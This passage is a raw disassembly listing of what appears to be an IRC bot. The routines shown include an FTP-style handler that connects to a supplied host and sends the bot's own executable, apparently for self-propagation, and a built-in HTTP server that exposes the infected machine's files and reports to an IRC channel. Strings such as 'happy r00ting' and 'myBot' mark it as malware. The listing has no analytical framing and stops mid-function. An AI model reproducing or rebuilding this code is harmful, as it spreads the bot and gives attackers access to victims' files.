lea eax, [ebp+var_FC]
push [ebp+var_C]
push offset aXX ; "%x%x\n"
push eax
call sub_41EA60
add esp, 44h
lea eax, [ebp+var_FC]
push 10h
push esi
push eax
call sub_41F450
mov [ebp+var_C], eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_3C]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_41EA60
add esp, 24h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_40F8D8
; ---------------------------------------------------------------------------
loc_40F7BE: ; CODE XREF: sub_40F2F1+411�j
lea eax, [ebp+var_B0]
push offset aRetr ; "RETR"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz loc_40F8B9
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+var_C]
lea eax, [ebp+var_3C]
push eax
call sub_40F909
pop ecx
cmp eax, 1
pop ecx
jnz loc_40F8AF
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_8E0]
push offset aFtpTransferSta ; "ftp transfer started to: %s"
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_444], esi
jnz short loc_40F83E
push esi
lea eax, [ebp+var_8E0]
push [ebp+var_448]
push eax
lea eax, [ebp+var_4C8]
push eax
push [ebp+var_6E0]
call sub_409C75
add esp, 14h
loc_40F83E: ; CODE XREF: sub_40F2F1+528�j
call sub_40F986
cmp eax, 1
jnz loc_40F8DB
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_8E0]
push offset aFtpTransferCom ; "ftp transfer complete to: %s"
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_444], esi
jnz short loc_40F89A
push esi
lea eax, [ebp+var_8E0]
push [ebp+var_448]
push eax
lea eax, [ebp+var_4C8]
push eax
push [ebp+var_6E0]
call sub_409C75
add esp, 14h
loc_40F89A: ; CODE XREF: sub_40F2F1+584�j
lea eax, [ebp+var_8E0]
push eax
call sub_415A3C
inc ds:dword_4E5ACC
pop ecx
jmp short loc_40F8DB
; ---------------------------------------------------------------------------
loc_40F8AF: ; CODE XREF: sub_40F2F1+504�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_40F8D8
; ---------------------------------------------------------------------------
loc_40F8B9: ; CODE XREF: sub_40F2F1+4E2�j
lea eax, [ebp+var_B0]
push offset aQuit_1 ; "QUIT"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jnz short loc_40F8DB
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_40F8D8: ; CODE XREF: sub_40F2F1+262�j
; sub_40F2F1+286�j ...
push edi
call ebx ; send
loc_40F8DB: ; CODE XREF: sub_40F2F1+3B6�j
; sub_40F2F1+555�j ...
push 64h
lea eax, [ebp+var_2A0]
push esi
push eax
call sub_41E4B0
add esp, 0Ch
loc_40F8ED: ; CODE XREF: sub_40F2F1+14F�j
; sub_40F2F1+178�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_40F40E
jmp loc_40F3D5
; ---------------------------------------------------------------------------
loc_40F8FF: ; CODE XREF: sub_40F2F1+10F�j
xor eax, eax
inc eax
loc_40F902: ; CODE XREF: sub_40F2F1+C1�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_40F2F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F909 proc near ; CODE XREF: sub_40F2F1+4FA�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_4F550C ; WSAStartup
push 0
push 1
push 2
call ds:dword_4F553C ; socket
push [ebp+arg_0]
mov ds:dword_4E5D0C, eax
mov [ebp+var_10], 2
call ds:dword_4F5528 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_4F552C ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push ds:dword_4E5D0C
call ds:dword_4F5530 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40F981
push ds:dword_4E5D0C
call ds:dword_4F5538 ; closesocket
call ds:dword_4F5508 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40F981: ; CODE XREF: sub_40F909+60�j
xor eax, eax
inc eax
leave
retn
sub_40F909 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F986 proc near ; CODE XREF: sub_40F2F1:loc_40F83E�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call ds:off_4F5344
lea eax, [ebp+var_104]
push offset aRb ; "rb"
push eax
call sub_41E490
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40FA1D
test byte ptr [esi+0Ch], 10h
jnz short loc_40FA01
push edi
mov edi, 400h
loc_40F9C9: ; CODE XREF: sub_40F986+78�j
push esi
push 1
lea eax, [ebp+var_504]
push edi
push eax
call sub_41E180
add esp, 10h
lea eax, [ebp+var_504]
push 0
push edi
push eax
push ds:dword_4E5D0C
call ds:dword_4F5540 ; send
push 1
call ds:dword_4F534C ; Sleep
test byte ptr [esi+0Ch], 10h
jz short loc_40F9C9
pop edi
loc_40FA01: ; CODE XREF: sub_40F986+3B�j
push esi
call sub_41BCF0
pop ecx
push ds:dword_4E5D0C
call ds:dword_4F5538 ; closesocket
call ds:dword_4F5508 ; WSACleanup
xor eax, eax
inc eax
loc_40FA1D: ; CODE XREF: sub_40F986+35�j
pop esi
leave
retn
sub_40F986 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FA20 proc near ; DATA XREF: sub_401C87+2227�o
; sub_40C049+46C�o
var_28F0 = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = byte ptr -8F0h
var_6F0 = byte ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = byte ptr -5E8h
var_360 = byte ptr -360h
var_25C = dword ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_41EF80
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
xor ebx, ebx
rep movsd
xor esi, esi
push 10h
inc esi
push ebx
mov [eax+3ACh], esi
lea eax, [ebp+var_24]
push eax
mov [ebp+var_14], esi
call sub_41E4B0
add esp, 0Ch
mov [ebp+var_24], 2
push [ebp+var_25C]
call ds:dword_4E2FC8 ; htons
push ebx
push esi
push 2
mov [ebp+var_22], ax
mov [ebp+var_20], ebx
call ds:dword_4E3048 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_40FDEC
mov eax, [ebp+var_254]
push 10h
imul eax, 234h
mov ds:dword_455F0C[eax], edi
lea eax, [ebp+var_24]
push eax
push edi
call ds:dword_4E2FF4 ; bind
cmp eax, 0FFFFFFFFh
jz loc_40FDEC
push 7FFFFFFFh
push edi
call ds:dword_4E2FF0 ; listen
cmp eax, 0FFFFFFFFh
jz loc_40FDEC
lea eax, [ebp+var_14]
push eax
push 8004667Eh
push edi
call ds:dword_4E3064 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jz loc_40FDEC
mov ebx, esi
mov [ebp+var_124], edi
mov [ebp+var_128], ebx
mov [ebp+var_4], edi
loc_40FAF7: ; CODE XREF: sub_40FA20+3C2�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_128]
push eax
push eax
push eax
lea eax, [ebp+var_6F0]
push eax
mov eax, [ebp+var_4]
lea edi, [ebp+var_6F0]
inc eax
rep movsd
push eax
call ds:dword_4E2FB0 ; select
cmp eax, 0FFFFFFFFh
jz loc_40FDE7
xor edi, edi
mov [ebp+arg_0], edi
loc_40FB2D: ; CODE XREF: sub_40FA20+3BC�j
lea eax, [ebp+var_6F0]
push eax
push edi
call ds:dword_4E2EB4 ; __WSAFDIsSet
test eax, eax
jz loc_40FDD2
cmp edi, [ebp+var_8]
jnz short loc_40FBAE
lea eax, [ebp+var_C]
mov [ebp+var_C], 10h
push eax
lea eax, [ebp+var_138]
push eax
push [ebp+var_8]
call ds:dword_4E305C ; accept
cmp eax, 0FFFFFFFFh
jz loc_40FDD2
xor ecx, ecx
test ebx, ebx
jbe short loc_40FB80
loc_40FB72: ; CODE XREF: sub_40FA20+15E�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_40FB80
inc ecx
cmp ecx, ebx
jb short loc_40FB72
loc_40FB80: ; CODE XREF: sub_40FA20+150�j
; sub_40FA20+159�j
cmp ecx, ebx
jnz short loc_40FB9D
cmp ebx, 40h
jnb short loc_40FB9D
mov [ebp+ecx*4+var_124], eax
mov ebx, [ebp+var_128]
inc ebx
mov [ebp+var_128], ebx
loc_40FB9D: ; CODE XREF: sub_40FA20+162�j
; sub_40FA20+167�j
cmp eax, [ebp+var_4]
jbe loc_40FDD2
mov [ebp+var_4], eax
jmp loc_40FDD2
; ---------------------------------------------------------------------------
loc_40FBAE: ; CODE XREF: sub_40FA20+126�j
mov esi, 1000h
lea eax, [ebp+var_28F0]
push esi
push 0
push eax
call sub_41E4B0
push esi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_41E4B0
add esp, 18h
lea eax, [ebp+var_28F0]
push 0
push esi
push eax
push edi
call ds:dword_4E2FE0 ; recv
test eax, eax
jg short loc_40FC35
push edi
call ds:dword_4E3060 ; closesocket
xor eax, eax
test ebx, ebx
jbe loc_40FDD2
loc_40FBFA: ; CODE XREF: sub_40FA20+1E6�j
cmp [ebp+eax*4+var_124], edi
jz short loc_40FC22
inc eax
cmp eax, ebx
jb short loc_40FBFA
jmp loc_40FDD2
; ---------------------------------------------------------------------------
loc_40FC0D: ; CODE XREF: sub_40FA20+207�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ebx, [ebp+var_128]
inc eax
loc_40FC22: ; CODE XREF: sub_40FA20+1E1�j
lea ecx, [ebx-1]
cmp eax, ecx
jb short loc_40FC0D
dec ebx
mov [ebp+var_128], ebx
jmp loc_40FDD2
; ---------------------------------------------------------------------------
loc_40FC35: ; CODE XREF: sub_40FA20+1C7�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_41E4B0
lea eax, [ebp+var_28F0]
xor edi, edi
push eax
call sub_41BC70
add esp, 10h
test eax, eax
jbe loc_40FDD2
loc_40FC62: ; CODE XREF: sub_40FA20+2FF�j
mov al, [ebp+edi+var_28F0]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_40FD0E
lea eax, [ebp+var_18F0]
push offset aGet_0 ; "GET "
push eax
call sub_41EBB0
pop ecx
test eax, eax
pop ecx
jz short loc_40FCDE
lea eax, [ebp+var_18F0]
push eax
call sub_41BC70
cmp eax, 5
pop ecx
jbe short loc_40FCDE
push offset asc_44A706 ; " "
push offset asc_44A708 ; " "
lea eax, [ebp+var_18F0]
push offset aGet_1 ; "GET "
push eax
call sub_41EBB0
pop ecx
pop ecx
push eax
call sub_41EBB0
pop ecx
pop ecx
push eax
call sub_41F870
push eax
lea eax, [ebp+var_23C]
push eax
call sub_41F620
add esp, 10h
jmp short loc_40FCF5
; ---------------------------------------------------------------------------
loc_40FCDE: ; CODE XREF: sub_40FA20+26D�j
; sub_40FA20+27F�j
lea eax, [ebp+var_18F0]
push offset asc_44A714 ; "\r\n"
push eax
call sub_41F7E0
pop ecx
test eax, eax
pop ecx
jz short loc_40FD2A
loc_40FCF5: ; CODE XREF: sub_40FA20+2BC�j
push 1000h
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_41E4B0
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_40FD0E: ; CODE XREF: sub_40FA20+252�j
lea eax, [ebp+var_28F0]
inc edi
push eax
inc esi
call sub_41BC70
cmp edi, eax
pop ecx
jb loc_40FC62
jmp loc_40FDD2
; ---------------------------------------------------------------------------
loc_40FD2A: ; CODE XREF: sub_40FA20+2D3�j
xor eax, eax
test ebx, ebx
jbe short loc_40FD66
loc_40FD30: ; CODE XREF: sub_40FA20+31F�j
mov ecx, [ebp+eax*4+var_124]
cmp ecx, [ebp+arg_0]
jz short loc_40FD58
inc eax
cmp eax, ebx
jb short loc_40FD30
jmp short loc_40FD66
; ---------------------------------------------------------------------------
loc_40FD43: ; CODE XREF: sub_40FA20+33D�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ebx, [ebp+var_128]
inc eax
loc_40FD58: ; CODE XREF: sub_40FA20+31A�j
lea ecx, [ebx-1]
cmp eax, ecx
jb short loc_40FD43
dec ebx
mov [ebp+var_128], ebx
loc_40FD66: ; CODE XREF: sub_40FA20+30E�j
; sub_40FA20+321�j
lea eax, [ebp+var_360]
push eax
call sub_41BC70
mov esi, eax
lea eax, [ebp+var_23C]
push eax
call sub_41BC70
add esi, eax
pop ecx
cmp esi, 104h
pop ecx
jnb short loc_40FDC9
and [ebp+var_10], 0
lea eax, [ebp+var_10]
push eax
push 8004667Eh
push [ebp+arg_0]
call ds:dword_4E3064 ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push [ebp+arg_0]
call sub_40FFD8
add esp, 14h
jmp short loc_40FDD2
; ---------------------------------------------------------------------------
loc_40FDC9: ; CODE XREF: sub_40FA20+36A�j
push [ebp+arg_0]
call ds:dword_4E3060 ; closesocket
loc_40FDD2: ; CODE XREF: sub_40FA20+11D�j
; sub_40FA20+146�j ...
mov edi, [ebp+arg_0]
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jbe loc_40FB2D
jmp loc_40FAF7
; ---------------------------------------------------------------------------
loc_40FDE7: ; CODE XREF: sub_40FA20+102�j
mov edi, [ebp+var_8]
xor ebx, ebx
loc_40FDEC: ; CODE XREF: sub_40FA20+6A�j
; sub_40FA20+92�j ...
call ds:dword_4E2F5C ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset unk_44A718
push eax
call sub_41EA60
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_40FE32
push ebx
lea eax, [ebp+var_8F0]
push [ebp+var_250]
push eax
lea eax, [ebp+var_5E8]
push eax
push [ebp+var_5EC]
call sub_409C75
add esp, 14h
loc_40FE32: ; CODE XREF: sub_40FA20+3ED�j
lea eax, [ebp+var_8F0]
push eax
call sub_415A3C
pop ecx
push edi
call ds:dword_4E3060 ; closesocket
push [ebp+var_254]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
sub_40FA20 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FE5C proc near ; DATA XREF: sub_40FFD8+245�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call sub_41EF80
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_550]
push eax
call sub_41EA60
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_654]
push eax
call sub_41EA60
xor edi, edi
add esp, 10h
cmp [ebp+var_A4], edi
lea eax, [ebp+var_9C]
jz short loc_40FEC7
push offset aTextHtml ; "text/html"
jmp short loc_40FECC
; ---------------------------------------------------------------------------
loc_40FEC7: ; CODE XREF: sub_40FE5C+62�j
push offset aApplicationOct ; "application/octet-stream"
loc_40FECC: ; CODE XREF: sub_40FE5C+69�j
push eax
call sub_41EA60
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_4F53D8 ; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_4F53D4 ; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_9C]
jnz short loc_40FF3F
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_41EA60
add esp, 24h
jmp short loc_40FF5A
; ---------------------------------------------------------------------------
loc_40FF3F: ; CODE XREF: sub_40FE5C+CA�j
push [ebp+var_B8]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_41EA60
add esp, 28h
loc_40FF5A: ; CODE XREF: sub_40FE5C+E1�j
lea eax, [ebp+var_1654]
push edi
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_1654]
push eax
push [ebp+var_44C]
call ds:dword_4E3018 ; send
cmp [ebp+var_A4], edi
jnz short loc_40FF9A
lea eax, [ebp+var_550]
push eax
push [ebp+var_44C]
call sub_410908
pop ecx
pop ecx
jmp short loc_40FFB7
; ---------------------------------------------------------------------------
loc_40FF9A: ; CODE XREF: sub_40FE5C+126�j
lea eax, [ebp+var_654]
push eax
push edi
push [ebp+var_44C]
lea eax, [ebp+var_550]
push eax
call sub_410287
add esp, 10h
loc_40FFB7: ; CODE XREF: sub_40FE5C+13C�j
push [ebp+var_44C]
call ds:dword_4E3060 ; closesocket
push [ebp+var_B4]
call sub_40B9A7
pop ecx
push edi
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
sub_40FE5C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FFD8 proc near ; CODE XREF: sub_40FA20+39F�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_41E4B0
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
push eax
jz short loc_41000E
push offset aS_14 ; "\\%s"
jmp short loc_410016
; ---------------------------------------------------------------------------
loc_41000E: ; CODE XREF: sub_40FFD8+2D�j
mov byte ptr [eax], 5Ch
push offset aS_15 ; "%s"
loc_410016: ; CODE XREF: sub_40FFD8+34�j
lea eax, [ebp+var_10C]
push eax
call sub_41EA60
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_41BC70
test eax, eax
pop ecx
jbe short loc_4100B1
mov [ebp+arg_8], 2
loc_410041: ; CODE XREF: sub_40FFD8+D7�j
lea eax, [ebp+var_10C]
push eax
call sub_41BC70
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_410081
cmp [ebp+esi+var_10C], 25h
jnz short loc_410081
cmp [ebp+esi+var_10B], 32h
jnz short loc_410081
cmp [ebp+esi+var_10A], 30h
jnz short loc_410081
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_41009B
; ---------------------------------------------------------------------------
loc_410081: ; CODE XREF: sub_40FFD8+79�j
; sub_40FFD8+83�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_410091
push 5Ch
pop eax
jmp short loc_410094
; ---------------------------------------------------------------------------
loc_410091: ; CODE XREF: sub_40FFD8+B2�j
movsx eax, al
loc_410094: ; CODE XREF: sub_40FFD8+B7�j
mov [ebp+ebx+var_210], al
loc_41009B: ; CODE XREF: sub_40FFD8+A7�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_41BC70
cmp esi, eax
pop ecx
jb short loc_410041
loc_4100B1: ; CODE XREF: sub_40FFD8+60�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push offset aSS_2 ; "%s%s"
push eax
call sub_41EA60
lea eax, [ebp+var_314]
push offset asc_44A966 ; "\n"
push eax
call sub_41F870
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:off_4F536C
xor esi, esi
inc esi
cmp eax, 10h
jz short loc_4100FF
cmp eax, 0FFFFFFFFh
jnz short loc_410102
push [ebp+arg_0]
jmp short loc_41017E
; ---------------------------------------------------------------------------
loc_4100FF: ; CODE XREF: sub_40FFD8+11B�j
mov [ebp+var_4], esi
loc_410102: ; CODE XREF: sub_40FFD8+120�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_41010F
mov [ebp+var_4], esi
loc_41010F: ; CODE XREF: sub_40FFD8+132�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_410189
cmp [ebp+arg_C], edi
jz short loc_41017D
lea eax, [ebp+var_314]
push offset asc_44A968 ; "*"
push eax
call sub_41F630
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_41EA60
lea eax, [ebp+var_210]
push eax
call sub_4109C5
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_41EA60
add esp, 1Ch
or [ebp+var_330], 0FFFFFFFFh
mov [ebp+var_31C], esi
jmp short loc_4101D8
; ---------------------------------------------------------------------------
loc_41017D: ; CODE XREF: sub_40FFD8+14E�j
push ebx
loc_41017E: ; CODE XREF: sub_40FFD8+125�j
call ds:dword_4E3060 ; closesocket
jmp loc_41026E
; ---------------------------------------------------------------------------
loc_410189: ; CODE XREF: sub_40FFD8+149�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
call ds:off_4F53C0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4101D8
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_41EA60
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:off_4F53DC
push esi
mov [ebp+var_330], eax
call ds:off_4F533C
loc_4101D8: ; CODE XREF: sub_40FFD8+1A3�j
; sub_40FFD8+1CE�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push offset unk_44A96C
push eax
call sub_41EA60
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_40B691
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov ds:dword_455F04[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_40FE5C
push edi
push edi
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov ds:dword_455F14[ecx], eax
jnz short loc_41027D
push ebx
call ds:dword_4E3060 ; closesocket
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset dword_44A9A0
push eax
call sub_41EA60
lea eax, [ebp+var_8C4]
push eax
call sub_415A3C
add esp, 10h
loc_41026E: ; CODE XREF: sub_40FFD8+1AC�j
; sub_40FFD8+2AD�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_410275: ; CODE XREF: sub_40FFD8+2AB�j
push 5
call ds:dword_4F534C ; Sleep
loc_41027D: ; CODE XREF: sub_40FFD8+266�j
cmp [ebp+var_318], edi
jz short loc_410275
jmp short loc_41026E
sub_40FFD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410287 proc near ; CODE XREF: sub_401C87+7811�p
; sub_40FE5C+153�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_41E4B0
mov edi, [ebp+arg_0]
push offset word_44A9D6
push edi
call sub_41F870
add esp, 14h
cmp [ebp+arg_8], ebx
push edi
jz short loc_4102E6
push [ebp+arg_8]
mov esi, 200h
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi
push eax
call sub_41EC30
add esp, 14h
jmp loc_4103E2
; ---------------------------------------------------------------------------
loc_4102E6: ; CODE XREF: sub_410287+3B�j
cmp [ebp+arg_C], ebx
jz loc_4103C8
call sub_41BC70
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41EC30
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41EC30
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
push edi
call sub_41BC70
push 3Ch
push 96h
mov byte ptr [eax+edi], 2Ah
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41EC30
add esp, 1Ch
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41EC30
add esp, 0Ch
jmp short loc_4103E2
; ---------------------------------------------------------------------------
loc_4103C8: ; CODE XREF: sub_410287+62�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41EC30
add esp, 10h
loc_4103E2: ; CODE XREF: sub_410287+5A�j
; sub_410287+13F�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_4E3018 ; send
cmp [ebp+arg_C], ebx
jz short loc_41047A
push [ebp+arg_C]
call sub_41BC70
cmp eax, 2
pop ecx
jbe short loc_41047A
push [ebp+arg_C]
call sub_41BC70
sub eax, 3
pop ecx
jz short loc_41042E
loc_410422: ; CODE XREF: sub_410287+1A5�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_41042E
dec eax
jnz short loc_410422
loc_41042E: ; CODE XREF: sub_410287+199�j
; sub_410287+1A2�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_41E510
lea eax, [ebp+var_594]
push eax
